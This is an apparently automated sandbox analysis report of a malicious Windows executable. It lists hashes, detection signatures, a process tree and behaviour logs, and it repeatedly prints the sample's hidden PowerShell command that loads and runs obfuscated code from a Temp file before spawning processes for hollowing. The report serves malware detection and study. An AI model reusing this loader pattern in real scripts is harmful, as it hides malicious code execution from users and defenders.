
Windows Analysis Report
vfhlZ0vrbe.exe

Overview

General Information

Sample name: vfhlZ0vrbe.exe
Analysis ID: 1588706
MD5: d29c88c314347eb87810e85e1e90a1f1
SHA1: 37082bccbde394171014c6a23ba59867fd0db181
SHA256: 122e9453d8424952667d1fbac82b31ccf2ab4076d14f306d1d97d675bc6fe213

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Contains functionality to read data from the clipboard
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files

Classification

  • System is w10x64native
  • vfhlZ0vrbe.exe (PID: 7208 cmdline: "C:\Users\user\Desktop\vfhlZ0vrbe.exe" MD5: D29C88C314347EB87810E85E1E90A1F1)
    • powershell.exe (PID: 3460 cmdline: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 2080 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3036 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7648 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3436 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4408 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7096 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1792 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7636 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 8020 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2240 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8124 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6060 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3400 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7192 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5640 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4056 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2444 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1480 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2400 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 2772 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 8072 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3288 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6728 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5376 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6516 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1180 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6520 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1252 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6784 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 6208 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8032 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6736 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6740 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5280 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2560 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8120 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", CommandLine: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vfhlZ0vrbe.exe", ParentImage: C:\Users\user\Desktop\vfhlZ0vrbe.exe, ParentProcessId: 7208, ParentProcessName: vfhlZ0vrbe.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", ProcessId: 3460, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", CommandLine: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vfhlZ0vrbe.exe", ParentImage: C:\Users\user\Desktop\vfhlZ0vrbe.exe, ParentProcessId: 7208, ParentProcessName: vfhlZ0vrbe.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", ProcessId: 3460, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: vfhlZ0vrbe.exe | Avira: detected
Source: vfhlZ0vrbe.exe | Virustotal: Detection: 61%
Source: vfhlZ0vrbe.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: vfhlZ0vrbe.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 0_2_00405A4F
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_00406620 FindFirstFileA,FindClose | 0_2_00406620
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_004027CF FindFirstFileA | 0_2_004027CF
Source: vfhlZ0vrbe.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vfhlZ0vrbe.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_0040550F
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_004033D8
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | File created: C:\Windows\resources\0409
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_00407318 | 0_2_00407318
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_00406AFA | 0_2_00406AFA
Source: vfhlZ0vrbe.exe | Static PE information: invalid certificate
Source: vfhlZ0vrbe.exe, 00000000.00000000.16247324063.0000000000443000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameunarmoureds navigatrerne.exeh$ vs vfhlZ0vrbe.exe
Source: vfhlZ0vrbe.exe | Binary or memory string: OriginalFilenameunarmoureds navigatrerne.exeh$ vs vfhlZ0vrbe.exe
Source: vfhlZ0vrbe.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal76.evad.winEXE@4304/15@0/0
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_004033D8
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_00404805 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA | 0_2_00404805
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar | 0_2_00402198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_03
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | File created: C:\Users\user\AppData\Local\Temp\nsp40B5.tmp
Source: vfhlZ0vrbe.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: vfhlZ0vrbe.exe | Virustotal: Detection: 61%
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | File read: C:\Users\user\Desktop\vfhlZ0vrbe.exe
Source: unknown | Process created: C:\Users\user\Desktop\vfhlZ0vrbe.exe "C:\Users\user\Desktop\vfhlZ0vrbe.exe"
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" (10 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe" (11 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" (10 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe" (7 identical entries)
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" (10 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe" (11 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" (10 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe" (7 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown (66 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
